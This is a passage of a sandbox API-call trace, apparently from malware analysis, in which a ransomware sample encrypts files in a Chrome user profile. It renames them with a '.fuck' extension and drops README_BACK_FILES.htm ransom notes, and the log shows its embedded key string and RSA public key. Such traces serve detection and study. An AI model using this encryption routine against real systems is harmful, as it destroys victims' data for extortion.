lpBuffer=0x2b9c5ec*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c5e4, lpOverlapped=0x0 | out: lpBuffer=0x2b9c5ec*, lpNumberOfBytesWritten=0x2b9c5e4*=0x5ec, lpOverlapped=0x0) returned 1 [0264.713] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0264.713] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.de_0.indexeddb.leveldb\\*.*", lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 0x2e7fbc0 [0264.722] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0264.722] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0264.722] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d72c | out: lpSystemTimeAsFileTime=0x2b9d72c) [0264.722] GetLastError () returned 0x0 [0264.722] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.de_0.indexeddb.leveldb\\000003.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\indexeddb\\https_www.google.de_0.indexeddb.leveldb\\000003.log")) returned 0x20 [0264.722] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.de_0.indexeddb.leveldb\\000003.log", dwFileAttributes=0x80) returned 1 [0264.723] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.de_0.indexeddb.leveldb\\000003.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\indexeddb\\https_www.google.de_0.indexeddb.leveldb\\000003.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0264.723] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.de_0.indexeddb.leveldb\\000003.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\indexeddb\\https_www.google.de_0.indexeddb.leveldb\\000003.log.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0264.724] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.de_0.indexeddb.leveldb\\000003.log.gsg", dwFileAttributes=0x2) returned 1 [0264.725] CryptAcquireContextA (in: phProv=0x2b9c728, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c728*=0x2e75dd0) returned 1 [0264.726] CryptCreateHash (in: hProv=0x2e75dd0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c72c | out: phHash=0x2b9c72c) returned 1 [0264.727] lstrlenA (lpString="cQjUWNeXOWocqpPGVyWaXFrKzMlQm") returned 29 [0264.727] CryptHashData (hHash=0x2e7fc00, pbData=0x28cb580, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0264.727] CryptDeriveKey (in: hProv=0x2e75dd0, Algid=0x6610, hBaseData=0x2e7fc00, dwFlags=0x1000000, phKey=0x2b9c718 | out: phKey=0x2b9c718*=0x2e7da00) returned 1 [0264.727] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----e", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c734, pcbBinary=0x2b9c714, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c734, pcbBinary=0x2b9c714, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0264.727] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c734, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c708, pcbStructInfo=0x2b9c710 | out: pvStructInfo=0x2b9c708, pcbStructInfo=0x2b9c710) returned 1 [0264.727] CryptAcquireContextA (in: phProv=0x2b9c724, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c724*=0x2e75f68) returned 1 [0264.727] CryptImportPublicKeyInfo (in: hCryptProv=0x2e75f68, dwCertEncodingType=0x1, pInfo=0x2eae870*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eae8a0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eae8a8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c71c | out: phKey=0x2b9c71c*=0x2e7e980) returned 1 [0264.727] CryptEncrypt (in: hKey=0x2e7e980, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c70c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c70c*=0x80) returned 1 [0264.728] CryptEncrypt (in: hKey=0x2e7e980, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e77750*, pdwDataLen=0x2b9c720*=0x18, dwBufLen=0x80 | out: pbData=0x2e77750*, pdwDataLen=0x2b9c720*=0x80) returned 1 [0264.728] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2e77750*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x2e77750*, lpNumberOfBytesWritten=0x2b9c730*=0x80, lpOverlapped=0x0) returned 1 [0264.729] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x1dc, lpOverlapped=0x0) returned 1 [0264.730] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x1dc, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x1e0) returned 1 [0264.730] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x1e0, lpOverlapped=0x0) returned 1 [0264.738] CloseHandle (hObject=0x5d50) returned 1 [0264.738] CloseHandle (hObject=0x5d4c) returned 1 [0264.738] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.de_0.indexeddb.leveldb\\000003.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\indexeddb\\https_www.google.de_0.indexeddb.leveldb\\000003.log.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.de_0.indexeddb.leveldb\\000003.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\indexeddb\\https_www.google.de_0.indexeddb.leveldb\\000003.log"), bFailIfExists=0) returned 1 [0264.740] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.de_0.indexeddb.leveldb\\000003.log", dwFileAttributes=0x0) returned 1 [0264.741] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.de_0.indexeddb.leveldb\\000003.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\indexeddb\\https_www.google.de_0.indexeddb.leveldb\\000003.log.gsg")) returned 1 [0264.742] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.de_0.indexeddb.leveldb\\000003.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\indexeddb\\https_www.google.de_0.indexeddb.leveldb\\000003.log"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.de_0.indexeddb.leveldb\\000003.log.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\indexeddb\\https_www.google.de_0.indexeddb.leveldb\\000003.log.fuck")) returned 1 [0264.744] CryptDestroyHash (hHash=0x2e7fc00) returned 1 [0264.744] CryptDestroyKey (hKey=0x2e7da00) returned 1 [0264.744] CryptReleaseContext (hProv=0x2e75dd0, dwFlags=0x0) returned 1 [0264.745] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0264.745] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0264.745] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0264.745] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0264.745] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d72c | out: lpSystemTimeAsFileTime=0x2b9d72c) [0264.745] GetLastError () returned 0x0 [0264.745] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.de_0.indexeddb.leveldb\\LOG.old" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\indexeddb\\https_www.google.de_0.indexeddb.leveldb\\log.old")) returned 0x20 [0264.746] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.de_0.indexeddb.leveldb\\LOG.old", dwFileAttributes=0x80) returned 1 [0264.746] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.de_0.indexeddb.leveldb\\LOG.old" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\indexeddb\\https_www.google.de_0.indexeddb.leveldb\\log.old"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0264.747] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.de_0.indexeddb.leveldb\\LOG.old.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\indexeddb\\https_www.google.de_0.indexeddb.leveldb\\log.old.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0264.748] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.de_0.indexeddb.leveldb\\LOG.old.gsg", dwFileAttributes=0x2) returned 1 [0264.749] CryptAcquireContextA (in: phProv=0x2b9c728, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c728*=0x2e75dd0) returned 1 [0264.750] CryptCreateHash (in: hProv=0x2e75dd0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c72c | out: phHash=0x2b9c72c) returned 1 [0264.750] lstrlenA (lpString="cQjUWNeXOWocqpPGVyWaXFrKzMlQm") returned 29 [0264.750] CryptHashData (hHash=0x2e7fc00, pbData=0x28cb5d0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0264.750] CryptDeriveKey (in: hProv=0x2e75dd0, Algid=0x6610, hBaseData=0x2e7fc00, dwFlags=0x1000000, phKey=0x2b9c718 | out: phKey=0x2b9c718*=0x2e7da00) returned 1 [0264.751] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----e", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c734, pcbBinary=0x2b9c714, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c734, pcbBinary=0x2b9c714, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0264.751] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c734, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c708, pcbStructInfo=0x2b9c710 | out: pvStructInfo=0x2b9c708, pcbStructInfo=0x2b9c710) returned 1 [0264.751] CryptAcquireContextA (in: phProv=0x2b9c724, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c724*=0x2e77640) returned 1 [0264.751] CryptImportPublicKeyInfo (in: hCryptProv=0x2e77640, dwCertEncodingType=0x1, pInfo=0x2eae940*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eae970*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eae978*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c71c | out: phKey=0x2b9c71c*=0x2e7ed80) returned 1 [0264.751] CryptEncrypt (in: hKey=0x2e7ed80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c70c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c70c*=0x80) returned 1 [0264.751] CryptEncrypt (in: hKey=0x2e7ed80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e76ba0*, pdwDataLen=0x2b9c720*=0x18, dwBufLen=0x80 | out: pbData=0x2e76ba0*, pdwDataLen=0x2b9c720*=0x80) returned 1 [0264.751] WriteFile (in: hFile=0x5d50, lpBuffer=0x2e76ba0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x2e76ba0*, lpNumberOfBytesWritten=0x2b9c730*=0x80, lpOverlapped=0x0) returned 1 [0264.752] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0xb4, lpOverlapped=0x0) returned 1 [0264.753] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0xb4, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0xc0) returned 1 [0264.753] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0xc0, lpOverlapped=0x0) returned 1 [0264.753] CloseHandle (hObject=0x5d4c) returned 1 [0264.753] CloseHandle (hObject=0x5d50) returned 1 [0264.753] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.de_0.indexeddb.leveldb\\LOG.old.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\indexeddb\\https_www.google.de_0.indexeddb.leveldb\\log.old.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.de_0.indexeddb.leveldb\\LOG.old" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\indexeddb\\https_www.google.de_0.indexeddb.leveldb\\log.old"), bFailIfExists=0) returned 1 [0264.761] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.de_0.indexeddb.leveldb\\LOG.old", dwFileAttributes=0x0) returned 1 [0264.761] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.de_0.indexeddb.leveldb\\LOG.old.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\indexeddb\\https_www.google.de_0.indexeddb.leveldb\\log.old.gsg")) returned 1 [0264.762] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.de_0.indexeddb.leveldb\\LOG.old" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\indexeddb\\https_www.google.de_0.indexeddb.leveldb\\log.old"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.de_0.indexeddb.leveldb\\LOG.old.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\indexeddb\\https_www.google.de_0.indexeddb.leveldb\\log.old.fuck")) returned 1 [0264.764] CryptDestroyHash (hHash=0x2e7fc00) returned 1 [0264.764] CryptDestroyKey (hKey=0x2e7da00) returned 1 [0264.764] CryptReleaseContext (hProv=0x2e75dd0, dwFlags=0x0) returned 1 [0264.764] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0264.764] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 0 [0264.764] FindClose (in: hFindFile=0x2e7fbc0 | out: hFindFile=0x2e7fbc0) returned 1 [0264.764] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.de_0.indexeddb.leveldb\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\indexeddb\\https_www.google.de_0.indexeddb.leveldb\\readme_back_files.htm")) returned 0xffffffff [0264.764] AreFileApisANSI () returned 1 [0264.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2eb5740, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 141 [0264.764] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.de_0.indexeddb.leveldb\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\indexeddb\\https_www.google.de_0.indexeddb.leveldb\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d9a0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0264.765] GetFileType (hFile=0x5d48) returned 0x1 [0264.765] WriteFile (in: hFile=0x5d48, lpBuffer=0x2b9c5ec*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c5e4, lpOverlapped=0x0 | out: lpBuffer=0x2b9c5ec*, lpNumberOfBytesWritten=0x2b9c5e4*=0x5ec, lpOverlapped=0x0) returned 1 [0264.766] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0 [0264.766] FindClose (in: hFindFile=0x2e7fb00 | out: hFindFile=0x2e7fb00) returned 1 [0264.766] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\indexeddb\\readme_back_files.htm")) returned 0xffffffff [0264.766] AreFileApisANSI () returned 1 [0264.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2d78, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 101 [0264.766] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\indexeddb\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9dd3c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0264.769] GetFileType (hFile=0x5d40) returned 0x1 [0264.769] WriteFile (in: hFile=0x5d40, lpBuffer=0x2b9c988*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c980, lpOverlapped=0x0 | out: lpBuffer=0x2b9c988*, lpNumberOfBytesWritten=0x2b9c980*=0x5ec, lpOverlapped=0x0) returned 1 [0264.770] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0264.770] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\*.*", lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0x2e7fb00 [0264.771] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0264.771] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0264.771] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0264.771] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0 [0264.771] FindClose (in: hFindFile=0x2e7fb00 | out: hFindFile=0x2e7fb00) returned 1 [0264.771] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticons\\readme_back_files.htm")) returned 0xffffffff [0264.771] AreFileApisANSI () returned 1 [0264.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2850, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0264.771] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticons\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9dd3c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0264.772] GetFileType (hFile=0x5d40) returned 0x1 [0264.773] WriteFile (in: hFile=0x5d40, lpBuffer=0x2b9c988*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c980, lpOverlapped=0x0 | out: lpBuffer=0x2b9c988*, lpNumberOfBytesWritten=0x2b9c980*=0x5ec, lpOverlapped=0x0) returned 1 [0264.774] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0264.774] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\*.*", lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0x2e7fc40 [0264.774] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0264.775] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0264.775] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0264.775] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0264.775] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0 [0264.775] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0264.775] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticonsold\\readme_back_files.htm")) returned 0xffffffff [0264.775] AreFileApisANSI () returned 1 [0264.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2b20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 108 [0264.775] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticonsold\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9dd3c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0264.786] GetFileType (hFile=0x5d40) returned 0x1 [0264.786] WriteFile (in: hFile=0x5d40, lpBuffer=0x2b9c988*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c980, lpOverlapped=0x0 | out: lpBuffer=0x2b9c988*, lpNumberOfBytesWritten=0x2b9c980*=0x5ec, lpOverlapped=0x0) returned 1 [0264.787] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0264.787] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0264.787] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0264.787] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\*.*", lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0x2e7fb00 [0264.787] 